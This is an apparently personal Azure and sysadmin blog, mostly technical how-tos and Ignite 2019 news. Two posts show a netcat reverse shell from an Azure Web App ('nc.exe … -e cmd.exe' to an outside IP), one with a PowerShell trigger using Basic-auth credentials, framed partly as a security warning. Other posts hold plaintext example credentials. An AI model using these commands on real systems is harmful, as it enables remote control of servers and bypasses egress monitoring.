Wiedza
  • 0 Koszyk
  • Kontakt
  • Moje konto
  • Blog
  • MOC On-Demand – co to takiego?
  • MOC On-Demand – Co zyskujesz?
  • Kursy MS

DevExpress – Incorrect route to ASPxUploadProgressHandlerPage.ashx

In case of error:

System.Exception

Incorrect route to ASPxUploadProgressHandlerPage.ashx. Please use the IgnoreRoute method to ignore this handler’s route when processing requests.

Please edit file RouteConfig.cs adding:

routes.IgnoreRoute(“{resource}.aspx/{*pathInfo}”);

routes.IgnoreRoute(“{resource}.asmx/{*pathInfo}”);

routes.IgnoreRoute(“{resource}.ashx/{*pathInfo}”);

Like this:

Please do not forget add to Layout file:


@Html.DevExpress().GetStyleSheets(


new StyleSheet { ExtensionSuite = ExtensionSuite.NavigationAndLayout },


new StyleSheet { ExtensionSuite = ExtensionSuite.Editors }

)


@Html.DevExpress().GetScripts(


new Script { ExtensionSuite = ExtensionSuite.NavigationAndLayout },


new Script { ExtensionSuite = ExtensionSuite.Editors }

)

Like this:

Linux Azure Files mount problem

In the case of:

mount error(13): Permission denied

or

mount error(16): Device or resource busy

probably your kernel doesn’t support encryption CIFS, so please Disable “Secure transfer required”

And use this command:

sudo mount -t cifs //STORAGEACCOUNTNAME.file.core.windows.net/SHARENAME /mnt -o vers=2.1,username=YOUR_PASSWORD_ENDING==,dir_mode=0777,file_mode=0777,sec=ntlmssp

An unencrypted transfer is working only in the same region where is your VM.

If you receive something like this:

mount: wrong fs type, bad option, bad superblock on

you need to install cifs:

sudo apt install cifs-utils

Troubleshooter:

https://gallery.technet.microsoft.com/Troubleshooting-tool-for-02184089

Magento install on Azure WebApp + Azure Database for MariaDB/MySQL server

If you try to install Magento in a normal way on Microsoft Azure WebApp using MariaDB or MySQL probably receive an error:

 

[ERROR] Magento\Eav\Model\Entity\Attribute\Exception: Warning: SessionHandler::read(): Session data file is not created by your uid in /home/site/wwwroot/vendor/magento/framework/Session/SaveHandler/Native.php on line 22 in /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php:121Stack trace:#0 /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/Dynamic/Developer.php(66): Magento\Framework\ObjectManager\Factory\AbstractFactory-

 

The solution is quite simple just select that you store sessions on DB instead files. After installation you can move it to Redis or to files adding:

session.save_handler = files

session.save_path = “var/www/magento2/var/session”

 

to the .user.ini file.

 

The next error you see it is connected with DB permission:

General error: 1419 You do not have the SUPER privilege and

The solution is quite simple just modify log_bin_trust_function_creators to ON in DB parameters in Azure Portal.

 

GCP App Engine via Cloud Flare – Step by Step

Usually, it is wise to protect your application against DDOS, XSS and SQL injections and so on. Unfortunately, at this moment it is impossible to use Google Cloud Armor with Google App Engine. The one solution can use Azure Application Gateway with WAF or Cloud Flare. How to configure Cloud Flare with App Engine – Step by Step:

  1. As usual, you must delegate DNS zone to Cloud Flare – it is easy to process after you register in Clod Flare.
  2. On Google Cloud Console – go to App Engine panel, Setting and Custom domains and you must add Custom Doman.
  3. You need to Verify a new domain, by adding the TXT record to your DNS settings. You do it in Cloud Flare. Please remember if you are adding it to the subdomain e.g. cc.wiadk.pl, you need to add TXT record to subdomain cc.wiadki.pl.
    If you have a problem with it you can switch to add CNAME record. That’s works better for me.
  4. After Verifying domain Google will create an SSL certificate for your domain for it, but it not works with Cloud Flare at this moment, so you need to disable SSL security like here:

  5. Now you can add A records in Cloud Flare:

    You can also add IPV6 addresses.

  6. During my test, Full End-To-end encryption didn’t work for me so we need to go to SSL/TLS settings and select flexible mode – like here:

    If you want to use Flexible mode only for one subdomain you can do it by using Pages Rules like here:

    In this way, only cc.wiadki.pl will be without end-to-end encryption.

  7. You can also use option Always use HTTPS to redirect from HTTP to HTTPS using Pages Rules like here:

    Or for all entries in your domain in SSL/TLS – Edge Certificates Settings:

     

    So for some time you can visit and test how this App Engine page works through Cloud Flare proxy:

    https://cc.wiadki.pl/

     

     

    After you enable Cloud Flare for App Engine please remember that App Engine still will be available using *.appspot.com address so please protect it using Client Certificate, Reverse Connection or at least IP restriction https://www.cloudflare.com/ips/.

     

    More info:

    https://support.cloudflare.com/hc/en-us/articles/200170166-Best-Practices-DDoS-preventative-measures

     

     

     

Certificate-based authentication for an Azure

Certificate-based authentication for an Azure
The best idea to authenticate for an Azure from application is to use Managed Identity. But sometimes it is not possible (e.g. On-Prem), so more secure way is to use certificate-based authentication than secret (password).

Here is a quick manual:

#Create Certificate
New-SelfSignedCertificate -Subject “CN=CertForMyApp” -CertStoreLocation “Cert:\CurrentUser\My” -KeyExportPolicy Exportable -KeySpec Signature
#Export Certificate from Store (mmc command)
#Create App registrations (portal.azure.com)
#Upload Certificate (portal.azure.com)
#Assign Permission (portal.azure.com)
#Check local Certificates
Get-ChildItem Cert:\ -Recurse|Select-String C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318
#Connect to Azure
Connect-AzAccount -ApplicationId f3ac2214-e37b-4f3e-9023-29abad27c8 -Tenant e9823fe4-675d-4843-a547-4154fc131c -CertificateThumbprint C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318

How to create Custom Read-Write role for Blob Storage in Azure

The best way is to use PowerShell Cloud Shell. Prepare environment:

cd \home
mkdir workingdir
cd workingdir

Write existing role to JSON format:

get-azroledefinition -Name “Storage Blob data Contributor”|ConvertTo-Json|Out-File ReadWriteRole.json

Edit the file by using (IsCustom set to true, put AssignableScope with correct subscription, delete unnecessary actions, give a new Name and description, Id is not important):

vi ReadWriteRole.json

{
“Name”: “Custom Role Storage Blob Read Write”,
“Id”: “ba92f5b4-2d11-453d-a403-e96b0029c9fe”,
“IsCustom”: true,
“Description”: “Custom Role Allows for read, write access to Azure Storage blob containers and data”,
“Actions”: [
“Microsoft.Storage/storageAccounts/blobServices/containers/read”,
“Microsoft.Storage/storageAccounts/blobServices/containers/write”,
“Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action”
],
“NotActions”: [],
“DataActions”: [
“Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read”,
“Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write”
],
“NotDataActions”: [],
“AssignableScopes”: [
“/subscriptions/4b1caf79-6e4c-49d-8160-5853298”
]
}

Exit editing file by pressing Escape, :, wq, enter

Add New Custom Role:

New-AzRoleDefinition -InputFile ReadWriteRole.json

Display All Custom Roles:

Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

And now you can use new Custom Role in Portal.

Reverse shell from Azure Web App via Web Hook

In this article I present idea about running NetCat in Web App and in this way access to the shell. If you need it to work this solution can be more comfortable. Just create start.bat like this:

d:\home\site\wwwroot\nc.exe 40.113.139.194 443 -e cmd.exe

and upload it as a WebJob to the Web App.

And in this way, you can always invoke it using and make connection to the shell:

$username = “`$webapprg09”
$password = “vzcXNeXmoltECLoALtLrYeincorect”
$base64AuthInfo = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes((“{0}:{1}” -f $username, $password)))
$userAgent = “powershell/1.0”
$apiUrl = “https://webapprg09.scm.azurewebsites.net/api/triggeredwebjobs/reverse/run”
Invoke-WebRequest -Uri $apiUrl -Headers @{Authorization=(“Basic {0}” -f $base64AuthInfo)} -UserAgent $userAgent -Method POST -Debug

First, you need to invoke server using:

netcat -l -p 443

Reverse shell to your WebApp – Console to Azure WebApp from your text environment like bash

As far I remember we can use console access to your Azure Web App – it is available via webbrowser, via Kudu, Console Access or via App Service Editor – wher you can upload files. It looks like this:

But it is not always very convenient to use it via web broswer especially when you are working on not so good internet connection or would like monitor logs.

You can use netcat to establish a connection from WebApp to your workstatnion. How to do it.

Just on the machine where you wan to use text console just install netcat using:

apt-get -y install netcat

and start to wait for the incoming connection. In this example, we will use a 443 port.

netcat -l -p 443

In your Web App upload nc.exe (source https://eternallybored.org/misc/netcat) and run it:

nc.exe 40.113.139.194 443 -e cmd.exe

Please be aware that nc.exe in Windows 10 is a unwanted software, so just after unzip you have only several seconds to upload it to the Web App.

What is it for?

The main reason for this blog-post is that Web App can be used as an enter point to your infrastructure and should be protected. A similar code can be run from your Web App via www and establish a reverse shell. It could be also dangerous especially when your Web App use connected to your private Virtual Network. In this way, a hacker can enter via your Web App to your Environment in Virtual Machine.

Cloud is always Shared Responsibility model – and you are also responsible for securing your environments, scan for unwonted files and filter egress and ingress traffic that it is possible in App Service Environment or via Application Gateway.

SQL Server Software Assurance Licensing Benefits for Disaster Recovery

If a customer is on-premises, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on-premises;
  • One free passive core for DR (async replication only);
  • One free passive core for DR on SQL Server on Azure VM (async replication only).

 

If a customer is on Azure VM, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on Azure VM;
  • One free passive core for DR on Azure VM (async replication only).

 

Passive SQL Server Instance – the following operations are allowed a passive secondary :

  • Database consistency — Maintenance operation;
  • Log Backups;
  • Full Backups;
  • Monitoring applications can connect and gather data.

News from the last quarter of 2019 year in the field of Azure Active Directory

Successor of Azure AD Connect: Azure AD Connect cloud

https://docs.microsoft.com/en-us/azure/active-directory/cloud-provisioning/what-is-cloud-provisioning

Azure AD authentication to Windows VMs

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-authentication-to-windows-vms-in-azure-now-in-public/ba-p/827840

Conditional Access report-only mode

Evaluate impacts of new policies before rolling them out across the entire organization.

Monitor impact with Azure Monitor and the new Conditional Access Insights workbook.

News in Identity Protection

  • Added and enhanced signals
  • New detections
  • Improved APIs
  • New user interface
  • Azure Sentinel integration

https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection

Security Defaults

Preconfigured security settings for common attacks

Basic level of security at no extra cost

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults

New build-in roles in Azure AD

  • Global reader
  • Authentication admin
  • Privileged authentication admin
  • Azure DevOps admin
  • Security operator
  • Several B2C roles
  • Group admin
  • Office apps admin
  • Compliance data admin
  • External identity provider admin
  • Kaizala admin
  • Message center privacy reader
  • Password admin
  • Search admin
  • Search editor

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/16-new-built-in-roles-including-global-reader-now-available-in/ba-p/900749

https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#available-roles

Azure AD entitlement management

  • Govern employee and partner access at enterprise scale
  • Automate employee and partner access requests, approvals, auditing and review

https://docs.microsoft.com/en-us/azure/active-directory/governance/entitlement-management-overview

Admin consent workflow

Admin consent workflow – gives end users a way to request access to applications that require admin consent.

Without an admin consent workflow, a user in a tenant where user consent is disabled will be blocked when they try to access any app that requires permissions to access organizational data.

  • Users can request access when user consent is disabled
  • Users can request access when apps request permissions that require admin consent
  • Gives admins a secure way to receive and process access requests
  • Users are notified of admin action

https://aka.ms/adminconsentworkflow/

Secure legacy apps with app delivery controllers and networks

  • Simplify secure access to on-premises legacy-auth based apps
  • Access apps that use Kerberos, header-based auth, form-based auth, LDAP, NTLM, RDP, SSH
  • F5, Citrix, Akamai, ZScaler
  • Allow use of conditional access and password less auth with on-prem apps

https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/secure-hybrid-access

Migrate to cloud authentication by using staged rollout

Configure groups of users to use cloud authentication instead of federation

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-staged-rollout

Passwordless security key sign in to on-premises resources

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/replace-passwords-with-a-biometric-security-key/ba-p/827844

Forest trust to an on-premises domain in Azure Active Directory Domain Services

https://docs.microsoft.com/en-us/azure/active-directory-domain-services/tutorial-create-forest-trust

Microsoft identity platform authentication libraries updates

https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-v2-libraries

Direct federation with AD FS and third-party providers for guest users

https://docs.microsoft.com/pl-pl/azure/active-directory/b2b/direct-federation

Tutorials for integrating SaaS applications with Azure Active Directory

https://docs.microsoft.com/azure/active-directory/saas-apps/tutorial-list

 

AWS Fargate Cluster coexistence with EC2 instances / Autoscaling Capacity Providers

There is a possibility add to your AWS Fargate Cluster Capacity Providers with autoscaling EC2 instances. You can use it to, debug some Containers – you can just log-in to EC2, where your container is running or optimize the use of EC2 / Fargate instances, especially when you use reserved EC2 instances.

When you add directly Autosaling EC2 instances as Capacity Providers you can receive this kind of errors:

unable to place a task because no container instance met all of its requirements

or

No Container Instances were found in your cluster

The trick is – when you create Launch Configuration please select Community AMI eg.: amzn2-ami-ecs-hvm-2.0.20191212-x86_64-ebs – of course, choose the latest one.

Chose also IAM permission: IAM role as ecsInstanceRole and the most important provide this in user data:

#!/bin/bash
echo ECS_CLUSTER=LastFinal >> /etc/ecs/ecs.config
sudo iptables –insert FORWARD 1 –in-interface docker+ –destination 169.254.169.254/32 –jump DROP
sudo service iptables save
echo ECS_AWSVPC_BLOCK_IMDS=true >> /etc/ecs/ecs.config

After you create autoscaling your instances should bring to live and you should them in your Fargate Cluster:

Now you can add the Capacity provider and Managed termination protection should be disabled.

And now you can Run your Tasks as a Fargate or as an EC2 launch type. Please remember that the Task is compatible with EC2.

Launch command line:

aws ecs create-service –capacity-provider-strategy capacityProvider=EC2CapacityProvider,weight=1 –cluster LastFinal –service-name shellexample –task-definition shell:2 –desired-count 1 –network-configuration “awsvpcConfiguration={subnets=[subnet-068457290b918bf38],securityGroups=[sg-0563e9b190a2ccf65]}”

This member is waiting for initial replication for replicated folder SYSVOL Share and is not currently participating in replication.

This is a similar problem to FRS reinitialize File Replication Service problem described for an example here: https://support.microsoft.com/en-us/help/290762/using-the-burflags-registry-key-to-reinitialize-file-replication-servi

 

But we need to do it to DFS-R, fast steps:

 

  1. On source domain controller stop DFS Replication Service.
  2. Open ADSI Edit and msDFSR-Enabled to False, here:


     

  3. Set msDFSR—Options to 1


  4. Do:

    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

     

  5. On all Domain Controllers Open ADSI Edit and msDFSR-Enabled to False, here:


  6. repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  7. Start DFS Replication Service
  8. Open ADSI Edit and msDFSR-Enabled to True on primary Domain Controller.
  9. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  10. On every Domain Controller Open ADSI Edit and set msDFSR-Enabled to True
  11. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  12. Now replication of SYSVOL should work again.

Migrating Existing RDS environment to Windows Desktop in Azure

This is Hans On Lab Recording from Microsoft Ignite 2019. You can migrate not only existing Remote Desktop Hosts but also VDI solutions. Script used in this Lab:

Install-Module -Name Microsoft.RDInfra.RDPowerShell
$tenant = “HOLVDI”
$hostpoolname = “rg982109-p”
Add-RdsAccount -DeploymentUrl “https://rdbroker.wvd.microsoft.com”
New-RdsHostPool -TenantName $tenant -Name $hostpoolname
New-RdsRegistrationInfo -TenantName $tenant -HostPoolName $hostpoolname -ExpirationHours 4 | Select-Object -ExpandProperty Token > “$env:PUBLIC\Desktop\token.txt”
Add-RdsAppGroupUser -TenantName $tenant -HostPoolName $hostpoolname -AppGroupName “Desktop Application Group” -UserPrincipalName “user982109@cloudplatimmersionlabs.onmicrosoft.com”
Set-RdsRemoteDesktop -TenantName $tenant -HostPoolName $hostpoolname -AppGroupName “Desktop Application Group” -FriendlyName “WS 2019”
#Install Agents
#https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWrmXv
#https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWrxrH
Get-RdsSessionHost -TenantName $tenant -HostPoolName $hostpoolname
#aka.ms/wvdweb
New-RdsAppGroup -TenantName HOLVDI -HostPoolName $hostpoolname -Name Wordpad -ResourceType RemoteApp
Get-RdsStartMenuApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad
Get-RdsStartMenuApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad | ? {$_.FriendlyName -match “Wordpad”}
New-RdsRemoteApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad -Name Wordpad -Filepath “C:\Program Files\WindowsNT\Accessories\wordpad.exe” -IconPath “C:\Program Files\WindowsNT\Accessories\wordpad.exe”
Get-RdsRemoteApp -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad
Add-RdsAppGroupUser -TenantName HOLVDI -HostPoolName $hostpoolname -AppGroupName Wordpad -UserPrincipalName “user982109-1@cloudplatimmersionlabs.onmicrosoft.com”
#aka.ms/wvdweb

Before start please do it (if you do not do it you will receive: Add-RdsAccount : One or more errors occurred. or New-RdsHostPool : User is not authorized to query the management service.):

Add Permission just open these links:

  1. https://login.microsoftonline.com/common/adminconsent?client_id=5a0aa725-4958-4b0c-80a9-34562e23f3b7&redirect_uri=https%3A%2F%2Frdweb.wvd.microsoft.com%2FRDWeb%2FConsentCallback
  2. wait a minute
  3. https://login.microsoftonline.com/common/adminconsent?client_id=fa4345a4-a730-4230-84a8-7d9651b86739&redirect_uri=https%3A%2F%2Frdweb.wvd.microsoft.com%2FRDWeb%2FConsentCallback
  4. wait a minute
  5. Open Azure Active Directory, Enterprise applications – Windows Virtual Desktop – Users and groups and add to your user Tenant Creator Role.
    Start Script
  6. Issue:

    New-RdsTenant -Name $tenant -AadTenantId <Azure Active Directory Tenant ID> -AzureSubscriptionId <Subscription Id>

  7. wait a minute and issue:

    New-RdsRoleAssignment -RoleDefinitionName “RDS Owner” -SignInName “mf@specsourcecom.onmicrosoft.com” -TenantGroupName “Default Tenant Group” -TenantName $tenant

More info here.

Ignite 2019 Hall Of Fame – Most Valuable Professional and Regional Directors

As usually during Microsoft Ignite Conference on a blue stands there was a list of all Most Valuable Professionals and on a black stands all Microsoft Regional Directors.

Microsoft Most Valuable Professionals, or MVPs, are technology experts who passionately share their knowledge with the community.
Microsoft Regional Directors are more focused on business than MVPs, they are independent technology enthusiasts who engage in dealing with and evangelizing one or more of Microsoft technologies in a region.

If you have a question, advice problem to solve you can always count on the help of Microsoft Most Valuable Professionals or Microsoft Regional Directors.

So there is a complete list of Most Valuable Professional during Microsoft Ignite 2019 and if you are MVP or RD you can always find yourself on the list.

A few more pics from List Of Glory:

 

Learning Pyramid – czyli jak uczyć się i uczyć innych skutecznie

Swojego czasu, mój kolega Certyfikowany Trener Microsoft mawiał – chcesz się nauczyć jakiejś technologii – poprowadź z tego szkolenie. Ja wtedy byłem na początku drogi Trenerskiej, w która tak swoją dragą nie zaangażowałem się nigdy w 100% i wtedy nie do końca się zgadzałem z tym twierdzeniem. Aczkolwiek trzeba przyznać, że coś w tym jest – ucząc innych zwłaszcza dorosłych, napotykając na przeróżne pytania – stajemy się ekspertami w danym temacie.

 

W czasie konferencji Microsoft Ignite 2019, a tak naprawdę w czasie zorganizowanego dnia dla Certyfikowanych Trenerów Microsoft, poruszony był temat efektywnego uczenia w szczególności dorosłych. Zaprezentowano wyniki badań i tzw. Piramidę Uczenia (Learning Pyramid). Do tej pory, jeszcze za czasów studenckich znałem Piramidę Potrzeb Masłowa (Hierarchia) – w której tak swoją drogą mamy również odesłanie do nauki.

Piramida Masłowa

Przechodząc do rzeczy wspomniana Piramida Nauki, mówi nam o efektywności nauki – czyli jakie są najbardziej efektywne metody nauki:

Learning Pyramid

 

Mając na uwadze powyższe badania, najbardziej efektywna forma nauki własnej to próba nauki innych – aczkolwiek nie ma co ukrywać, jeżeli jesteśmy “zieloni” z jakiegoś tematu – to ciężko zacząć uczyć innych. Aczkolwiek, jeżeli już mamy trochę wiedzy możemy organizować kursy dla owych “zielonych” w temacie i w ten sposób sami będziemy się rozwijać w danym temacie.

Nie będę się rozwijał nad poszczególnymi piętrami w tejże piramidzie, bo jest to zebranie wydawało się rzeczy oczywistych. Najlepsza nauka przez praktykę – jak coś zrobimy wdrożymy – na pewno się nauczymy. Tak samo obejrzenie czegoś w rzeczywistości jak działa (Demo) daje więcej niż tylko przeczytanie o czymś. A jeszcze więcej to podyskutowanie o czymś.

Co mnie zaskakuje w powyższym opracowaniu, to stopień Audio/Video – tzn. jest bardziej wartościowy niż czytanie. Warto o tym pamiętać, gdy powiemy dziecku “Wyłącz tego youtuba i poczytaj” – z premedytacji nie poruszam tutaj tematu związanego z wartościami, prezentowanymi przez niektórych youtuberów.

Wracając na rynek IT, z którym jestem związany to naszła mnie myśl, że część osób / firm, zapewne nie znając powyższych badań, zaczęło realizować powyższy scenariusz nauki – praktyczne zastosowanie Piramidy Nauki. Niewątpliwie liderem na rynku Polskim był Robert Stuczynski z projektem Virtual Study, gdzie były i nadal są prezentowane materiały szkoleniowe z zakresu IT – swoją drogą jest to kopalnia wiedzy dot. historycznych systemów jak Lotus Notes. Była to realizacja stopnia 3 – Audio / Video, ale zabrakło kolejnych stopni, które to stopnie realizowane są przez niżej wymienione produkty.

Najbardziej daleko z kolei poszedł Mirosław Burnejko, gdzie w oparciu o Dyskusje i prezentacje swojej drogi życiowej zbudował firmę od podstaw i w czasie 2 lat odniósł niesamowity sukces – myślę to o Chmuarowisku. Sam Mirek poszedł dalej i realizuje ostatni stopień tym razem Piramidy Masłowa i chce inspirować innych do realizacji Piramidy od stopnia 3 do późniejszych, a myślę tutaj o Fabryce Kursów, gdzie uczy, jak zarabiać na kursach.

Przeglądając zasoby Internetu, a także uczestnicząc w tzw. Community kolejne osoby niejako pod tym samym szyldem realizują z powodzeniem kolejne przedsięwzięcia szkoleniowe i np. Michał Furmankiewicz wydaje się, że przejął zarządzanie https://szkolachmury.pl/, gdzie co chwile pojawiają się kursy na które wręcz czeka rynek i mam na myśli tutaj Kubernetes i Google Cloud.

Bardzo jestem ciekaw ostatniego produktu, wydaje się dla najbardziej zaawansowanych, a na pewno tworzonych przez ekspertów, którzy zapewne połamali klawiatury wdrażając kolejne yaml’e w usłudze Kubernetes. Mowa tutaj o Łukasz Kałużny w akompaniamencie z Jakub Gutkowski i Piotrkiem Stappem https://poznajkubernetes.pl/ – swoją drogą najbardziej profesjonalna strona.

Na śmierć bym zapomniał o Maciej Aniserowicz – https://edu.devstyle.pl/, którego kursy są najbardziej popularne i odniosły największy sukces – a i mają pojawić się nowe.

 

Jeżeli chodzi o profesjonalne firmy szkoleniowe, to Centrum Szkoleniowe ABC DATA – Action, a obecnie Cloud Team również oferowała szkolenia Audio / Video – ale śmiem twierdzić, iż za bardzo się nie przyjęły – aczkolwiek w czasie szkoleń wykorzystywane są z powodzeniem wszystkie techniki z Powyższej Piramidy. Natomiast Altkom Akademia oprócz powyższego angażuje uczestników w dyskusje po szkoleniu, gdzie mają oni możliwość zadawania pytań i na odpowiadania na nie i w ten sposób realizują ostatni poziom Piramidy.

W sumie można powiedzieć, że wszyscy realizują strategie Learning Pyramid – dla dobra rozwoju rynku IT. Zastanawiam się czasami czy rynek się nie nasyci i kiedy, aczkolwiek patrząc na ssanie na specjalistów IT nie nastąpi to szybko.

Na koniec bym zapomniał, że sam na tym poletku działam i zapraszam na moje kursy.

 

Mariusz Ferdyn

 

PS: Jeżeli kogoś nie wymieniłem, to z czystego zapomnienia. Jednocześnie informuje, iż nie reklamuje powyższych firm kursów, a inwestycja w wiedze to najlepsza inwestycja, ale przed zakupem zwłaszcza w Black Friday i Cyber Monday należy się zastanowić – mimo, że wszyscy oferują zwrot pieniędzy, jeżeli nie będziemy zadowoleni.

 

Continuously upload files to FTP using PowerShell

Sometimes we need to continuously upload files to FTP from local disk. We can do it using the following PowerShell Script.

import-module NetCmdlets
$i=5
while ($i -eq 5){
new-item c:\wgrywam -itemtype directory
Get-ChildItem C:\CB08 -Recurse |? {$_.LastWriteTime -le (get-date).AddMinutes(-3)} |% {move-item $_.Fullname c:\wgrywam}
Get-ChildItem C:\wgrywam -Recurse |% {send-ftp -server ftp.pol.pl -user uzytkownik -password haslo -localfile $_.Fullname -remotefile $_.name}
#Get-ChildItem C:\wgrywam -Recurse | % { remove-item $_.Fullname }
Remove-Item -Recurse -Force c:\wgrywam
}

So this script simply create temporary directory c:\wgrywam, move to it all files older than 3 minutes from C:\CB08 -Recurse. After that connect to ftp.pol.pl, using username user uzytkownik and password haslo and put there all files from temporary (c:\wgrywam) directory. Finally remove temporary (c:\wgrywam) directory.

To use this you need to install NetCmdlets  from here.

How Azure can help you with performance tests using JMeter

This article is rather dedicated to attendees of http://www.jstalks.net/ conference. You can use this article if you do not attendee to that conference, but probably it will need more engagement from you to understand of flow this:

During this session, you will learn how to adopt Azure to do a performance test using Jmeter. In the simple script, you will launch ~10 VM with installed Jmeter that will be ready to start your performance test. We will also create simple test plan and test your site.

Jmeter – Fast track how to install it:

  • Java 64bit (!!! – all java downloads) Windows Offline (64-bit)
    • https://javadl.oracle.com/webapps/download/AutoDL?BundleId=240728_5b13a193868b4bf28bcb45c792fce896
  • https://archive.apache.org/dist/jmeter/binaries/apache-jmeter-5.1.1.tgz

Just after that it will work, but for better performance, several tweaks needed (the left is the final settings, right is the default one):

jmeter.properties file:

jmeter.bat file (right are desired one):

(all files are at the end of the documents – so you can use control-c, control-v)

JMeter – Test scenario:

So the next one is to launch jmeter.bat and create your first test scenario. How to do it some links:

  • https://jmeter.apache.org/usermanual/build-web-test-plan.html
  • https://octoperf.com/blog/2018/03/29/jmeter-tutorial/

But do not waste time using the previous one, rzetelnekursy, modify it using copy, paste and go ahead with your first test.

Jmeter – distribute tests accrost servers:

https://jmeter.apache.org/usermanual/jmeter_distributed_testing_step_by_step.html

But do not waste time using the previous one, just create new Virtual Machine Scale Sets with the desired scale of VMs. You can use cheap Low Priority VMs for that. To install Apache Jmeter use this cloud-init script:

cloud_init

BTW: you can use this to install JMeter on Linux just copy-paste on your workstation or on any other cloud.

Reconfigure Server to launch tests on salves:

user.properties file:

  • http.connection.stalecheck$Boolean=true
  • server.rmi.ssl.disable=true

jmeter.properties file (left is desired one):

And do not allow communication with 1099 port with the server or just disable the firewall on the server.

And now you can start your distributed tests.

Debug

tail -f /root/apache-jmeter-5.1.1/bin/jmeter-server.log

“java.rmi.ConnectException: Connection refused to host: 10.0.0.6; nested exception is” – solution:

  • Check communication, firewall, etc.
  • Use names instead IP – you can use http://ssl4ip.westeurope.cloudapp.azure.com/

    And this like remote_hosts=10-0-0-4.h.com.pl,10-0-0-5.h.com.pl,10-0-0-7.h.com.pl

  • jmeter.bat file:

    Set rmi_host=-Djava.rmi.server.hostname=10.0.0.6

    set ARGS=, adding one after %rmi_host%

All config files used in this article:

allmodifiedfiles

Official: BOOK OF NEWS, Microsoft Ignite 2019, Orlando, November 4-8, 2019

BOOK OF NEWS Microsoft Ignite 2019:

Ignite2019BookofNews.pdf

Azure News from Microsoft Ignite 2019 – 3 minutes read Mariusz’s bullet list

Here is a list of new Azure features announced during Ignite 2019, that in my opinion you should learn more.

This is not a complete list – just I noticed them, and it is only for Azure. Some of them could be announced before.

 

Virtual Machines:

  • New Sizes Daav4, Eav4, NVv4, NDv2
  • OS Disk Size 2TB+, 12 TB RAM (VM Gen2)
  • Reservation – pay by month.

 

Virtual Machine Scale Set:

  • Different Sizes of VMs in Scale Set;
  • Faster provisioning of custom images.

 

Containers, Kubernetes:

  • Azure Availability Zones;
  • Different Sizes of VMs;
  • API – security with authenticated IP;

 

Azure Containers Instances:

  • GA – Windows 2019 based containers;
  • Windows Container in your Vnet.

 

 

Azure Arc, Azure, Azure Resource Manager:

  • Single Control Plane for any resource anywhere.

 

Azure Migrate:

  • Assessment for Not Virtualized Environment;
  • CSV import-based discovery;
  • Dependency Mapping without installing Agent;
  • Web App migration;
  • Virtual Desktop migration;
  • GA- Agent Less Migrate for VMWare.

 

Functions:

  • .net Core 3.0 (Preview);
  • Support Python 3.7;
  • Durable Functions 2.0;
  • Azure Monitor – Logs;
  • PowerShell support GA;
  • Premium Functions – GA.

 

API Management:

  • Developer Portal – GA;
  • ARC API Management Gateway – Public Preview.

 

App Service:

  • App Services Certificate – Multiple cert for multiple hostnames

 

IoT Central:

  • App Templates for Industries;
  • Azure Time Series Insights;
  • Azure Maps;
  • Power BI Integration;
  • AccuWeather integration;
  • Plug & Play;
  • Preview Maps private indoor mapping.

 

Azure Firewall Manager – Public Preview

 

Azure Stack:

  • Azure Stack is now Azure Stack HUB, and we have also Azure Stack Edge and Azure Stack HCI

 

Azure Stack Hub:

  • Cloud-Init
  • Event Hubs
  • Kubernetes Clusters
  • Windows Virtual Desktop – Private Preview

Konwersja ustawień GUI na rejestr i następnie na komendy PowerShell

W przypadku uruchamiania rozwiązań typu Infrastructure as a Code bardzo często korzystamy z tzw. Custom Script Extension, w którym piszemy skrypt PowerShell, który się wykonuje przy kreowaniu maszyny wirtualnej. W przypadku maszyn z systemem operacyjnym Windows zazwyczaj potrzebujemy zmodyfikować rejestr, aby ustawić odpowiednie właściwości maszyny wirtualnej.

System Windows przyzwyczaił nas do wyklikiwania potrzebnych opcji, które tak naprawdę są zmianami w rejestrze i nie dotyczy to tylko ustawień systemu operacyjnego, ale takż np. Office. Jak w takim razie szybko skonwertować ustawienia wyklinane z GUI na skrypt PowerShell.

  1. Ściągamy oprogramowanie porównujące rejestr, przed i po zmianie (https://www.nirsoft.net/utils/registry_changes_view.html).
  2. Uruchamiamy oprogramowanie i robimy Snapshot przed zmianami w GUI.
  3. Następnie wykonujemy zmiany w GUI.
  4. Porównujemy Snapshot rejestru versus obecne wpisy w rejestrze.
  5. Zazwyczaj znajdziemy więcej wpisów w rejestrze, które się zmieniły – np. wpisy dotyczące telemetrii, ale kopiujemy do schowka, tylko te, które są wymagane:

  6. Teraz takie wpisy trzeba przekonwertować na PowerShell, do tej pory robiłem to ręcznie, ale przypadkowo wpadłem na stronę https://reg2ps.azurewebsites.net/, gdzie może to być wykonane z automatu.

